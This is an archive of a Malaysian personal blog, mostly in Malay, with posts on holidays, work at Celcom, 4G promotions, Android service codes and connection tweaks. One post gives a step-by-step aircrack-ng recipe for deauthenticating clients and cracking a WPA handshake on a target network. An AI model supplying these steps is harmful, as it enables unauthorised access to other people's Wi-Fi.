Tuesday, November 19, 2013

Cameron ..aku datang !

Selasa 19 Nov 2013


Hari ini bermulalah perjalanan ku bercuti-cuti Malaysia menuju destinasi Cameron Highland bersama Boss dan family serta staff lain. Percutian secara percuma yang dihadiahkan oleh boss Lisa menjelang hari jadi saya yang ke -14  eh 24 bulan  Tahun yang jatuh pada 30 November nanti. Tapi Lisa tetap comel je sebab badan Lisa memang kecik molek and cumil je . haahaa... dahh makan banyak pon tetap tak leh besar gak.

Terimakasih CELCOM portawifi sebab memberikan kemudahan untuk saya mengakses internet walaupon dalam kereta . hehehe..  Demoline Free sponsor by Celcom.



 
Friday, September 13, 2013

Full Step Hacking Wpa Faster

Full Step Hacking Wpa Faster - Kali LINUX

airmon-ng

airmon-ng start wlan0

airodump-ng mon0
Ctrl + C = (Stop Run Terminal)

airdump-ng -w (NAMA WIFI) -c (CH: 1) --bssid (MAC ADDRESS TARGET) mon0

OPEN NEW TERMINAL:

aireplay-ng -e (NAMA Wifi) --deauth 500 -c (STATION MAC) -a (--bssid ) mon0
*(Tunggu Sehinga Keluar WPA handshake -Di Atas Akan Tertulis)
*( Sekiranya Tiada WPA handshake Terkeluar Maybe Tidak Dapat Melakukan Cracking Password)
*( Pastikan #Data/s = 1000 hingga 5000 (Baru Syok Crack)
*Ctrl+ C = (STOP RUN TERMINAL)

aircrack-ng -s -1 -d ( Station MAC) -m (--bssid) -f 1000 -w (password.txt/dictory) Sky-01.cap<--(ivs) -x2
*(sekiranya ingin run crack password sila save Password Di Root Folder)
*(Sky.o1-cap akan DI Save Di bahagian Root Folder Juga secara Auto)

Enjoy For Hack Wpa/WPA2
------------------------------------------
Saturday, August 24, 2013

Cara memilih High Heels


tadaaaa...

Tudiaaa.. kasut gojes milik saya ! (gojes lah sangat  -.- " ) 
Kasut yang saya pakai time Raya tahun ni. Beli 2 hari sebelum raya bertemankan encik2 Bodyguards ( My Fisrt BRO and My 3rd Bro ) dengan membodek2 sikit minta dibelikan tudung . Haha..
Kasut ni saya beli di Kluang Mall je , Tak mampu nak beli Brand Mahal ! sebab menurut Lisa, kasut yang cantik tu tak semestinya MAHAL ! Lisa beli  murah je.. rm75 je . Kasut kaler hitam , saiz 4 tinggi 4.5 inchi . Tinggi kan ...? Lisa memang suka pakai kasut tinggi. Tapi tak hari2 memakai kasut tinggi lah , sebab selalu memakai kasut tinggi boleh menyebabkan Kanser Kaki. (orang cakap macam tu lah ) 

Gojes,Cantik , And comel je kaki Lisa pakai kasut tu. Lisa memang memilih yang jenis ada tali dipergelangan kaki tu sebab :
1. tak cepat penat sebab nak stabilkan badan dengan menumpukan berat badan kita di kaki
2. sebab Kasut kan jenis yang semakin lama pakai semakin besar, kalau dah besar,takde Tali kat pergelangan kaki tu .. kita jadi susah time jalan. Saiz kasut dah kembang dan kita nak jalan pon kena control untuk menstabilkan berat  badan kita. Elak terjatuh time pakai kasut nanti jadi Malu and kalau teruk.
 boleh bengkak !

Tips memilih kasut High Heels :

1. Pilih sesuai saiz kaki anda 
Jangan memilih saiz besar dengan harapan kelak boleh pakai lama, tapi semua itu salah ! yang akan terjadi ialah kalian tidak akan selesa memakai kasut itu ketika berjalan .
Jangan memilih kasut saiz  lebih kecik dari ukuran kaki anda sebab itu hanya akan menyeksa kaki kalian , dan akan membuat kaki kalian luka . 

2.Pilih yang berkualitas baik .
Kualitas baik tak semestinya MAHAL, yang sesuai dengan poket kita pon ada. Pandai-pandailah survei dalam mall . Memang Ada. Jadi tak perlu membazir sangat lah. Tapi kalau Kalian suka barang Branded ,, beli je kalau kalian Mampu. Kualiti bahan pon kita kena tengok juga, cari bahan kasut yang soft and nyaman untuk kaki kita . Mybe ade kalian yang mempunyai kaki sensitif terhadap bahan kasut. 

3. Belajar pakai kasut  tinggi sebelum memakainya. 
Kalau kalian tak pandai nak pakai high heels kalian kena belajar dulu, sebab jangan seksa kaki kalian hanya untuk nampak cantik atau "TINGGI" .  Hindari memakai high heels dalam majlis2 penting jika anda tak pernah memakai heels ,takut time tengah berjalan nanti kain terpijak kasut. time tu anda Jatuh!  FUHHH memang malu . Kaki pon boleh bengkak dan tak boleh berjalan .

4. Sesuaikan kaler Kasut dengan kulit warna kita atau baju kita . 

Itu sahaja yang Lisa nak kongsikan dengan kalian. Pilih High Heels sesuai pilihan hati kalian ( macam memilih pasangan hidup pulak )

JOURNEY

It's a long long Journey, Till i kow i'm supposed to be.
It's a long long Journey, And i don't know if i can believe.
When shasow fall and block my eyes,
i am lost and i know that i must hide.
It's a long long journey , till i find my way home to you.

Many days i've spent drifting on through empty shores.
Wondering what my purpose,wondering how make me strong.
I know i will falter , i know i will cry, i know you'll be standing by my side.
It's a long long Journey, and i to be close to you

Sometimes it feels no one understands , i don't even know why i do the things i do .
When pride  builds me up till i can't see my soul,will you break down these walls and put me through.
Cause it's a long long journey , till i feel that i am worth the price.
you paid for me on cavalry,beneath those stormy skies.
When satan mocks and friends turn to foes,it feel like everythings is out make me lost control
it's a long long journey , till i find my way home to you.

~Someone once told me that life is like a JOURNEY ,that we all shall live each day like a give. ~


Thursday, August 15, 2013

Samsung TAB-3 dengan kelajuan 4G

Let us know how many you want (demo as well if you need) by next Tuesday since most of you all are on leave.
· 1 color SKU - White only.
· Code: T3150
· SPECS at a glance:
· Processor = 1.5 Ghz Dual Core
· Display = 1280 x 880, 189 PPI
· Battery = 4,450mAh
· Memory - 1.5GB RAM = mSD up to 64 GB
· Camera 5 MP AF + 1.3 MP
· LTE
· Target launch: end Aug
 
 
Samsung dah keluar TAB-3 , pagi ini Lisa baru mendapat email dari HQ. Celcom telah mengambil Samsung Tab -3 dan bundle dengan package-package celcom yang akan dilancarkan akhir bulan ini. Yang pastinya Kualiti suara dan internet untuk Tab 3 ini lebih laju berbanding yang lain sebab device ini menggunakan system LTE 4G . Coverage 4G pon telah diperluas. Dulu percubaan LTE bermula di Sunway  dan sekarang sedang diperluas sampai ke johor. 
Next week Lisa ade meeting mengenai coverage LTE 4G untuk kawasan celcom Shoutern Kluang . Tower LTE 4G pon telah dipasang akan tetapi belum ditentukan tarikh  bila mula akan beroperasi LTE 4G tersebut. Bagi pengguna Celcom, sila kunjungi Celcom Center atau Blue CUBE untuk mendapatkan maklumat LTE dikawasan kalian. 
Tuesday, August 13, 2013

ANDROID Secret Code

DISCLAIMER: This information is intended for experienced users. It is not intended for basic users, hackers, or mobile thieves. Please do not try any of following methods if you are not familiar with mobile phones. We'll not be responsible for the use or misuse of this information, including loss of data or hardware damage. So use it at your own risk.

Code: *#*#4636#*#* - This code can be used to get some interesting information about your phone and battery. It shows following 4 menus on screen:

* Phone information
* Battery information
* Battery history
* Usage statistics

Code: *#*#7780#*#* - This code can be used for a factory data reset. It'll remove following things:

* Google account settings stored in your phone
* System and application data and settings
* Downloaded applications

It'll NOT remove:

* Current system software and bundled applications
* SD card files e.g. photos, music files, etc.

PS: Once you give this code, you get a prompt screen asking you to click on "Reset phone" button. So you get a chance to cancel your operation.

Code: 2767*3855# - Think before you give this code. This code is used for factory format. It'll remove all files and settings including the internal memory storage. It'll also reinstall the phone firmware.

PS: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.

Code: *#*#34971539#*#* - This code is used to get information about phone camera. It shows following 4 menus:

* Update camera firmware in image (Don't try this option)
* Update camera firmware in SD card
* Get camera firmware version
* Get firmware update count
WARNING: Never use the first option otherwise your phone camera will stop working and you'll need to take your phone to service center to reinstall camera firmware.

Code: *#*#7594#*#* - This one is favorite one. This code can be used to change the "End Call / Power" button action in your phone. Be default, if you long press the button, it shows a screen asking you to select any option from Silent mode, Airplane mode and Power off.

You can change this action using this code. You can enable direct power off on this button so you don't need to waste your time in selecting the option.

Code: *#*#273283*255*663282*#*#* - This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.

Code: *#*#197328640#*#* - This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

WLAN, GPS and Bluetooth Test Codes:
*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* - WLAN test (Use "Menu" button to start various tests)
*#*#232338#*#* - Shows WiFi MAC address
*#*#1472365#*#* - GPS test
*#*#1575#*#* - Another GPS test
*#*#232331#*#* - Bluetooth test
*#*#232337#*# - Shows Bluetooth device address

*#*#8255#*#*

This code can be used to launch GTalk Service Monitor.

Codes to get Firmware version information:
*#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate
*#*#1234#*#* - PDA and Phone
*#*#1111#*#* - FTA SW Version
*#*#2222#*#* - FTA HW Version
*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number

Codes to launch various Factory Tests:
*#*#0283#*#* - Packet Loopback
*#*#0*#*#* - LCD test
*#*#0673#*#* OR *#*#0289#*#* - Melody test
*#*#0842#*#* - Device test (Vibration test and BackLight test)
*#*#2663#*#* - Touch screen version
*#*#2664#*#* - Touch screen test
*#*#0588#*#* - Proximity sensor test
*#*#3264#*#* - RAM version
Saturday, August 3, 2013
Sunday, July 28, 2013

Ramadhan Give Away By ZZ





Assalamualaikum dan Selamat Berbuka Puasa


Hari ini Ahad 28/07/2013 tepat memasuki Ramadhan yang ke- 19 , Jadi Apa cerita ranadhan Kalian ? 

Lama tak buka Blog dan macam sarang tikus dah , Walking2 Blog kawan ade ternampak entry Give Away by ZZ jadi Lisa buat sertai Give Away itu . Kalau dapat Tudung ke .. eh sape tau kan Lisa jadi salah seorang yang bertuah .. hehe


Caranya senang je .. boleh tengok di SINI . Kalau Berminat  Tudung ke baju muslimah , boleh tengok dan beli  Kat ZZ . Kalau ingin Add Friend Lisa di facebook.. , cari je FB Lisa " Mawar Biru " 


OK lah, tiba masanya untuk bersiap pergi terawih . Jangan Ponteng2 tau ... 

Bye,,, Assalamualaikum :) 
Saturday, July 27, 2013

Dapat durian runtuh!Tukar kerja baru

Setelah hampir 7tahun Lisa bertahan di syarikat Celcom sendirian berhad, kini tiba masanya untuk tukar angin.  Lisa dapat tawaran bekerja di Holding Ismail SDN.BHD as PA Dato' Ismail Abdul Rahman selaku Director Manager pemilik syarikat tersebut.
Masa itu,Dato' Ismail yg memang customer Lisa bertahun2 datang bayar bill. Time bayar bill ada customer chinese yang datang cari boss,then Lisa cakap-cakap mandarin dengan customer tu.Mendengar Lisa cakap mandarin time tu lah Dato'terus interbiew lisa. ..(cewahhh) !  Tanya bila balik kg,bla bla bla. Lisa jawap la.. Next years nak berhenti keje sebab nak duduk dengan mak.Dia tnya gaji bape sebab dia tau lisa memang staff paling lama kat sini. Lepas Lisa jawap je semua dia offer kat Lisa keje kat syarikat dia.  Gaji bayar double, keje? Dia cakap kije senang je..Duduk office tgok cctv, key in data je.  Kalau ade deal bissness ng chinese.. Dia bawa la lisa. Sebab kalau chinese tipu ke hape nti lisa leh paham.  Lagi pon dia kurang percaya dengan pkerja chinese.
Dia tau semua pasal Lisa..sampai Bf Lisa pon dia tau. Aik??haha...Sebenarnya Lisa selalu tersempak dengan dia kalau dia makan ng kawa dia kat OLD TASTE , Nak tegur? Malu and segan weih...sebab dia DATO' and Lisa? Org bese je. Kalau dia kenal tk pe.. Kalau tak ingat Lisa?Malu sehh.
Job baru..  kat Damansara. Errr.. Jauh. Lisa selesa di KLUANG. Tapi dia ada office kat kluang juga. Kalau Lisa ditempatkan diKluang kan bagus jugak. Hehe.. Ye lah... Lisa ni tak biasa kat tempat orang. Huhu.
Lisa bagitau kat staff Lisa yang bila2 masa Lisa leh terus berhenti and tukar kerja. Muka staff Lisa sedih.  Lisa meetting ng Terrytori Executive. . Lisa pon bagitau lah sebab tak nak nti dia cari Lisa pulak time Lisa dah x keje.  Muka dia pon sedih.. Adeh,, hurm, dia cakap dah selesa ng Lisa..semua pon dah kenal Lisa macam mane kalau wat kerja. Customer Lisa pon sama.. Lebih2 customer yang memang rapat dengan Lisa. Nanti kalau mereka urgent nak guna tepon..sape yang tolong bayarkan bill mereka. Serba salah Lisa.
Lisa tak kejam sangat sampai berhenti mendadak because office  Lisa still perlukan Lisa. Ada kelebihan dan kekurangan kalau Lisa tukar kerja. Hurm... Tapi memang tak kan lepaskan peluang lah...

Sunday, July 21, 2013

Lepas wallet ilang..cincin pulak ilang!

Ya Allah.. Berikan kesabaran dan ketabahan hati terhadap ujian yang Engkau berikan kepadaku. Bulan lepas.  wallet + rm550 + 50 $ singapore dollar ilang! Hari ini pulak..cincin ilang. Dugaan ape lagi ya Allah.  Hamba betul betul tak sanggup menanggung ya Allah.. Macam mane nak kumpul duit untuk  bawa mak ayah pergi haji? Mcm mane nak kumpul duit untuk nikah? Ya Allah..cukup dengan memberikan hamba ujian ya Allah. Masalah selama satu minggu ni datang bertubi-tubi. Duit office rm180 belum settle lagi... Kali ini pulak cincin yg tak sampai 2 bulan aku pakai. Down sangat sangat down. Tak mampu nak berkata apa2 lagi.
Semalam Lisa cek..ada lagi dalam beg. Selama ini pon tak pernah hilang kalau letak dalam beg. Ya Allah... Apa yang harus aku lakukan? Selama ini aku bekerja tak pernah amek duit office. Aku xpernah tinggal zakat. Aku tak pernah lupa padaMu ya Allah.... Hamba selalu jaga perilaku hamba. Dugaan ini terlalu berat ya Allah :'(



Sayang seribu sayang , tak sampai 2 bulan pakai, cincin tu dah ilang :( .






Saturday, July 20, 2013

Alone...

6.20pm 20.07.2013
Ku Duduk di anak tangga,bertemankan sang mentari yang mula melabuhkan tirainya. Melayang anganku bersama tiupan sang bayu,rindunya dengan orang nan jauh disana. Tak terasa airmata jatuh menghiasi pipi. Sebak hati,sayu tapi aku cuba gagahkan juga hati ini untuk mula melepaskan kenangan yang ada disini. Satu persatu akan kucoba menghapus memory disini,walaupon berat.
Diantara dua pilihan yang susah. Antara kehidupan ku yang sekarang atau kehidupan asalku dulu. Antara jiwaku yang dah selesa disini atau jiwaku yang mungkin aku x bahagia. Antara pilihan mak untuk duduk bersamanya atau pilihanku, tinggal disini. Ya ALLAH.. Berilah hamba petunjuk dan jalan yang terbaik untuk diriku.
Wednesday, May 15, 2013

Cerita Balqis , part 1


Namaku , Balqis Binti Isa . Orang memanggilku , Qis . Aku dilahirkan dari keluarga yang cukup berada masa itu . Aku anak bongsu dari 3 bersaudara . Ketika aku lahir , kakak dan Abang aku bekerja diluar kawasan daerah . Satu tahun sekali baru aku dapat jumpa dengan mereka . Mak saya , seorang wanita yang bekerjaya . Hari-hariku dibesarkan oleh pengasuh dan bermain-main dengan pekerja Mak . Ibuku pergi kerja jumpa klien dia yang berada dijauh sana.. memerlukan masa 2 /3 jam dari rumah , pagi subuh dia dah keluar rumah . Ketika itu aku masih terlelap lena dengan tidurku . Dan MAk pulang ketika aku tertidur sebab menunggunya . Ayah ku , bekerja diperantauan . 1 bulan sekali balik . Abangku kerja satu tempat dengan ayah. Kakak ku .. hurm, dia dah kawen dah dan duduk ikut suami dia .

Masa kecilku berlalu dengan pengasuh dan pekerja2 Mak . Tapi aku selalu rasa sunyi , dan rasa kurang kasih sayang dari family . Ye lah , kanak-kanak mana tau lagi pasal membanting tulang . Yang kanak-kanak tau .. Main , Mak, Ayah,Family .. kebersamaan . Masa itu aku terfikir adakah Mak , Ayah dan Kakak serta Abang tak sayang aku ke ? kenapa mereka meninggalkan aku berseorangan dirumah setiap hari . Walaupon pengasuhku baik dan ada anak dari pengasuhku itu yang berumur 1 tahun lebih tua dari aku sebagai teman bermain aku , tapi aku rasa ada yang kurang . Aku tak bahagia . Makanan sedap , TV , Kemewahan , semua aku dapat . Tapi bukan semua itu yang aku nak , aku nak hangatnya kasih sayang seorang Mak dan Ayah serta family yang lengkap . Aku tak benci dengan mereka, hanya terkadang rasa kecik hati . blockquote>

Aku paling suka kalau aku sakit atau ketika aku Demam , kerna masa itu lah Mak ade bersama ku . Ayah pon selalu telpon untuk memastikan yang aku dah makan ubat dan berangsur pulih.Kalau tak sembuh jugak , ayah akan balik dan menjaga aku dengan Mak ! happy dan seronok teramat sangat masa itu . Mak akan membawa aku pergi mana-mana saja yang aku minta . Atau jika Mak memang tak boleh tinggalkan kerja ,Mak akan bawa aku pergi Kerja ! Yeah.. disitu aku dapat banyak kawan. Anak-anak dari Boss-boss yang kebanyakan berbangsa chinese. Memang sungguh menyeronokkan sebab dapat ramai kawan .

****

Umurku dah mendekati 5tahun , jiran sebelahku adalah seorang cikgu tadika . Aku cakap dengan Mak yang aku nak sekolah tadika . Mak cakap aku belum cukup umur , tapi aku paksa mak untuk bagi aku sekolah tadika . Aku pujuk ayah jugak , dan akhirnya mereka memmberiku ijin untuk sekolah . Aku berlari kegirangan !! selepas ni aku tak de lah nak rasa bosan lagi.

Aku pergi sekolah dengan cikgu , nama dia cikgu Yati . Dah kawen, ada 2 orang anak. anak yang bongsu 1 tahun lagi muda dari aku . Mak pon dah tak selalu pergi subuh sebab kadang aku mengada minta Mak antar aku pergi sekolah . Kalau mak antar aku pergi sekolah , Aku dan Mak sarapan sama-sama . Mak akan suapkan aku , ketika itu dapatlah jugak aku rasa kehangatan kasih sayang seorang MAK .

1 Tahun berlalu , masa untuk para kanak-kanak tadika umur 6 tahun untuk menamatkan belajar . AKU ? eh, usia aku 5 tahun saja , dan aku pergi sekolah pon sebab nak bermain dengan kanak-kanak yang lain. Bukan sebab nak dapatkan sijil untuk Masuk sekolah derajah . Tapi cikgu aku , dia cakap dengan Mak yang aku kalau nak lanjutkan ke sekolah darjah 1 pon dah boleh . Setelah beberapa hari berfikir.. akhirnya mak memasukkan aku ke sekolah Darjah 1 . ***

*bersambung.................
Monday, April 15, 2013

Abang BEN kembar ke ??





Assalamualaikum dan selamat malam semua..


" Ben Ashaari " wah... Nampak nama itu mesti kalian kenal kan, siapakah gerangan tersebut. Yup ! abang BEN  seorang blogger terkenal ! yang dah selama 5 tahun berada didalam dunia Blog ini. Bermula Blognya yang pertama  yang ber-tajuk  " eceh.." pada 1 januari 2008  ( eh.. betul ke ni ?kalau tak silap betul lah sebab Lisa ambil sumber dari blog abg BEN  . Kalau kalian nak lebih pasti.. sila tanya empunya badan ya  )  . woow .. lama kan, 5 tahun tuhh.  Bermula 2008 sampailah sekarang 2013. Dalam blog dia ade si comel Qhalif iman , anak abg Ben . Qhalif memang comel sangat-sangat ,naseb baek lah jauh ! kalau dekat, konfem Lisa dah culik Qhalif ( Opsss... berani ke nak culik Qhalif yang dijaga oleh Bapa sekaligus Bodyguard yang berbadan tegap . hahah.. ye tak ye je berani nak culik kan ) 


Baiklah, sebenarnya entri ni Lisa tulis sebab kalau tengok wajah encik BEN ni , saya teringat dengan someone! Bf  ke ? uih.. bukanlah! Someone yang Lisa memang suka tengok dia dan nyaman tenang bila berada disampingnya . Suaranya lembut dan boleh mencairkan Lisa.  teeettt    eh wait ! macam dah lari dari apa yang Lisa nak sampaikan. Hahahaha.. Nama dia Mohd Faizal . Dia ialah Chanel Manager Regional Enterprise Sales .  Lisa sangat-sangat seronok bila meeting jumpa dia. haippp! bukan sebab jatuh hati okayh tapi sebab dia pandai menyampaikan plan-plan dan kerjaya yang Celcom X-clusif Partner (CXP) perlu lakukan. Abg Faizal peramah ! seyes memang seronok lah jumpa dia. Wajah dia macam pic abang Ben yang diatas tu ha,, yang belah kiri tu. Mula-mula tengok abg Ben eh silap Pic abg Ben memang agak sedikit terkejut, ingatkan dia kembar abg Faizal tu ha,, tapi rupanya bukan. Aish.. nasib baik Lisa tak tanya kepada abg Faizal . Kalau tak.. eh.. malulah saya ... hehehe

Saturday, April 13, 2013

Malam minggu with my lappy

Jari manis tersarung rapi oleh  ubat dan plaster putih yang bengkak sebab accident kecil ketika bekerja . Mata ku yang sepet terhias dengan Cermin mata comel berbingkai pink . Ibu jari, Jari telunjuk dan jari tengah tangan kanan dan tangan kiri menari-nari diatas keyboard laptop . Dentuman jam sebanyak 9 kali seakan menertawakanku kerna aku bersendirian di rumah . Ye lah.. hari ini kan malam minggu, malam muda -mudi. ERK ? kesiannya aku duduk bersendirian bertemankan laptop yang sentiasa menemaniku dikala aku kesepian sedangkan kawan-kawanku yang lain keluar bermalam minggu dengan BF/GF  mereka. Cik Lisa tak jeles ke ? Errr.. Jeles lah jugak ! tapi.. abah and umi tak bagi keluar malam-malam . Tak elok untuk kesehatan dan tak manis anak dara keluar malam-malam. Boleh keluar tapi kena bertemankan akak atau abang . Tak pe lah ,,

Mawar Kuning hari ini dia cakap nak pergi Genting . Huwaaaa ,,, bertambah lah sunyi sepi dalam malam minggu aku  . Biasa message message dengan si Mawar Kuning tapi malam ini xde message dengan dia dah, Aku tak nak ganggu dia . Malam tadi pon aku message pukul 10 dia balas pukul 1 pagi. err 

Segmen Blogwalking 24 Jam by Emas Putih


24 jam je ! 12/04/2013 pukul 8 malam sampai 13/04/2013 pukul 8 malam ! huwaaaa
baru ternampak artikel ini. heheheh. Dengan 10 minute yang tersisa sebab sekarang dah  7 : 50 pm saya cuba join segmen ini ... tak salah kan mencuba. :P 


 Segmen Blogwalking 24 Jam by Emas Putih
     





klik dan join... ^_^


salam 
        
Wednesday, January 30, 2013

REBATE SmartPhone rm200 PKB (Pakej Komunikasi Belia)

25 Januari , Lisa meeting mengenai  Pakej Komunikasi Belia (PKB) atau orang lebih mengenal dengan Rebate smartphone rm200 dari Goverment . Celcom Exsklusif Partner telah memula beroperasi pakej ini pada 29 Januari 2013 yaitu semalam . Berikut adalah Senarai telephone pintar yang ada di Celcom Outlet untuk menebus rebate smartphone tersebut : 



 ~~> Kriteria Kelayakan:
1.Pakej tersebut adalah sah untuk belia Malaysia yang berumur berusia antara 21 hingga 30 tahun
2.Gaji kasar bulanan bagi pemohon mestilah tidak melebihi RM3, 000
3.Hanya 1 telefon pintar setiap pelanggan yang layak


Bagaimana Untuk mendaftar ? 

1. Pra-pendaftaran nbi.skmm.gov.my untuk mendapatkan nombor rujukan anda .
2.  Bawa kad pengenalan, nombor rujukan dan kad pelajar (jika berkenaan) kepada  Celcom Outlet yang menyertai.
3.--untuk Postpaid (pelan pasca bayar ) :
*Mendaftar untuk mana-mana pelan Celcom First Plans bagi telefon pintar yang dipilih dan menikmati rebat RM200 anda

---untuk pelan Prepaid (Pra bayar ) :
* Pembelian pek Xpax dan menambah nilai untuk menikmati RM200 matikan peranti yang dipilih anda di mana-mana peniaga kami menyertai ATAU jika anda sudah pengguna Xpax, sila segarkan semula untuk menikmati rebat RM200.

Penebusan smartphone dicawangan Celcom terbuka untuk semua pengguna telco . 
Jika anda pengguna maxis atau Digi , kalian boleh menebus smartphone tersebut di cawangan celcom yang terpilih untuk menyertai PKB tersebut. 

Rebate smartphone itu hanya valid untuk 30hari sahaja ya, jadi bagi siapa-siapa yang telah mendaftar tu cepat2 lah knjungi outlet yang boleh untuk menebus rebate tersebut . MIsalnya : Celcom , maxis, DIgi , Yes , SENHENG , U mobile dan banyak lagi la. Jika Kalian ingin mengetahui lebih lanjut tentang rebate di Celcom anda boleh bertanya kepada saya . 

Wah,, banyaknya Lisa tulis di blog sampai lalai keje ,, heheh okay lah Time Lisa untuk mula kerja .bye-bye...


,, apa-apa pertanyaan pasal rebate tu boleh kunjungi http://nbi.skmm.gov.my/ 


Friday, January 11, 2013

Nikmati kelajuan internet 10kali lebih cepat dari biasa !




Introducing Celcom 4G LTE.
Lightning-fast speeds on the best network.

"As Malaysia's widest and fastest mobile network, we're all about keeping up with the latest technologies and innovations as an integral part of our consumer offerings. Celcom is proud to launch a premium 4G network to step up to our customers'
ever-changing mobile lifestyles and data usages, so you can enjoy unimaginable data speeds like never before." potongan artikel yang Lisa ambil dari laman web "CELCOM" mengatakan bahwa dalam masa terdekat ini Celcom akan meningkatkan Network dari yang biasa kita dengar 1G,2G,3G dan sekarang akan dilancarkan 4G LTE .

  Celcom akan melancarkan
4G LTE, rangkaian terpantas dan paling maju di dunia data lagi. LTE (Long Term Evolution) adalah generasi keempat wayarles komunikasi mudah alih yang akan membolehkan anda untuk mengalami kelajuan sehingga 10 kali lebih cepat daripada apa yang anda sedang gunakan.


Mungkin anda pernah mendengar sebelum ini  tentang '4G" yah.  Mereka mengatakan bahwa telco mereka mampu menempuh  kelajuan dengan line 4G , Akan tetapi yang sebenar ialah kelajuan yang telco itu tawarkan tidak mampu menembus 4G meskipun berada dibawah pencawang .Akan tetapi  4G LTE ( Long Term Evolution) yang akan dilancarkan tidak lama lagi mempunyai kelajuan internet yang akan memuaskan bagi pihak customer CELCOM untuk melayari jariangan internet.


Celcom merancang untuk melabur RM300 juta untuk membangunkan rangkaian LTE dengan menjalankan peningkatan, pengembangan dan ujian hidup untuk memastikan kualiti optimum dalam prestasi mudah alih. Walaupun rangkaian 3G sedia ada kami adalah setanding dengan rangkaian berprestasi tinggi di seluruh dunia dengan kelajuan sehingga 42Mbps, ini akan mudah didarab dengan Celcom 4G LTE.

 Semua yang anda suka tentang Internet pada peranti mudah alih anda akan disediakan sehingga 10 kali lebih cepat.Anda boleh melihat ke hadapan untuk muat turun yang tidak penampan, permainan yang tidak akan ketinggalan, perbualan video yang tahu tidak jeda - yang lebih kaya, lebih lancar pengalaman Internet mudah alih sama sekali, semua pada rangkaian terpantas dan terluas negara.


Sekarang ini,4G LTE belum dilancarkan lagi . Percubaan LT E boleh anda rasakan dengan berkunjung ke Menara Celcom, Kuala Lumpur  Atau pon kunjungi Blue CUbe @Sunway Pyramid . 

Thursday, January 10, 2013

Antara Laman Web yang di block SKMM

antara laman web yg dah di block oleh SKMM

http://www.warez-bb.org/
http://www.thepiratebay.org/
http://www.movie2k.to/
http://www.megavideo.com/
http://www.putlocker.com/.
http://www.depositfiles.com/
http://www.duckload.com/
http://www.fileserve.com/
http://www.filestube.com/


so cara nk BYPASS adalah seperti :-

**mybe ade yg dah taw cara ni....juz sharing**
 
 
 
 
 copyright:therylisanurulain/lounge's_ofkocai/mawarbiru
Wednesday, January 9, 2013

Speed Up Internet to hi speed internet for WINDOWS XP USER



[TUTORIAL] Speed Up Internet to hi speed internet  for WINDOWS XP USER ~
----------------------------------------------------------------------------------

1- First ,Open the Windows Registry,Go to Start /Run/ then type  Regedit,then navigate to below location.

(HKEY_LOCAL_MACHINE\SYSTEM|CurrentControlSet\Services\Tcpip\Serviceprovider)

2- Change the "Priority" lines to :


LocalPrioriy  = 005 (5) - local names cache
Hostspriority= 006 (6) - the HOSTS file
DNSPriority= 007(7) -DNS
NetbtPriority = 008 (8) (NetBT name-resolution,including WINS)

3- Reboot for change to take effect





copyright:groups/black.deejays/helperhere/team/malaysia/forums/lisa --"Blackdj/Owner
Tuesday, January 8, 2013

TUTORIALS Speed up your Conection Broadband







[ TUTORIALS ] Speed up your Conection Broadband ~

Disconnect kalian punya Broadband dan klik Tools /Option /profile Management..

Lepas tu buat NEW Access Connection seperti dibawah ini.  Follow Step-By-Step..

---------------------------------------------------------


1) Profile Name (Open DNS)


2) APN *Static (Dialogbb)


3) Authentication :


-access number (*99**1# )

-User Name  (Biarkan kosong )
-Password   ( Biarkan Kosong )

4) Klik advanced 


- Authentication Protocol Setting ( Tanda pada  [PAP] sahaja)

-DNS setting ( Tanda pada static dan ubah DNS Server seperti dibawah ini ) 

---------------------------------------------------------


DNS Server IP  :


Primary DNS     : 208.067.222.222

Secondary DNS : 208.067.220.220


---------------------------------------------------------


5) Klik OK  dan Klik Save 


6) Sila Restart 





semoga berjaya !! ^_^ 






copyright:groups/black.deejays/helperhere/team/malaysia/forums/lisa --"Blackdj/Owner
Thursday, January 3, 2013

Mata ku Lebam

Hurm...
Malang sungguh Lisa hari ini. Dah lah lambat lunch , lepas tu  sampai office je Lisa dah kena marah boss. Hadui,,rasa dia tu  pilih kasih pulak dah . Erm , macam teranak tiri. Orang lain buat salah, Lisa pulak yang kena jawap. Pasal Account Bank Celcom nie ha... tak balance rm8++.++ lah. Kenapa boleh kurang ? Padahal hari hari Lisa buat cun cun . Then untuk bulan Desember 2012 , anak dia yang buat semua report tu,
boleh pulak dia tanya Lisa kenapa Ammount tak Balance. grrrrr. nampak sangat kan . Dia yang tak paham macam mana Prosses approval tu bukan hari-hari buat untuk closing . Huh.. Jujur.. Boss saya tu hanya tahu nak untung and nak salahkan staff dia je. Hurm, Anak dia pon tak suka dengan dia . Sebab dia kedekut , dengan anak dia pon nak berkira Tapi kalau dengan adik beradik dia.. pergh,,, bagi duit macam air mengalir berapa berapa pon dia bagi kat Adik dia tapi kalau anak dia minta duit? huh... tak sah kalau tak membebel dulu.

Hari ini Lisa sampai nangis dalam office, suruh Lisa cari balance yang 8ratus lebih tu hari ini jugak ! eh.. eh.. Kenapa Lisa pulak yang kena buat ? Kan anak dia yang salah ,, and sebelum nie Bukan Lisa yang jaga account . huh. Chek account start dari 2010-2013.. chek perhari satu2. Hurm.. mata dah lah pedih. Lisa menangis bukan ape, sebab dia Nada suara dia tu ha ,, tak reti nak slow. Dah lah lisa nie hati tisue .. Kalau ade Laki dia,, pergghh memang tak kan berani marah Staff. Anak dia pon cakap Mak dia tu kedekut , bak kata "MONEY IS EVERYTHING " kurang satu sen pon membebel.. tapi kalau ade untung banyak. senyap ! kan... hah.. tu lah boss saya .
Seriously,,, nti office Celcom GM Lisa dah siap, Lisa nak pergi ke another Celcom Blue CUbe. Padan muka dia.. Biar dia settle masalah dia sendiri. huh! bukan berbaloi pon nak up kan Company dia nie ha. Lupa lah agaknya dia ,,, without all staff mane boleh Dapat penghargaan " THe BEst Voice Acrhiver 2010"  .
Tak pe Lisa... sabar- sabar.. nanti dah pindah ke JB , dah tak nampak lagi lah Muka dia tu ha kan.. yang wat sakit hati . Ish... hari-hari marah , tak sayang jantung lah agaknya .

7:40 pm.. still at office.. hurm ... Bila nak siap kerja ni ? Mata ini dah tak larat nak tengok amount2 tu ..

Pindah office lagi!

2.14 pm...

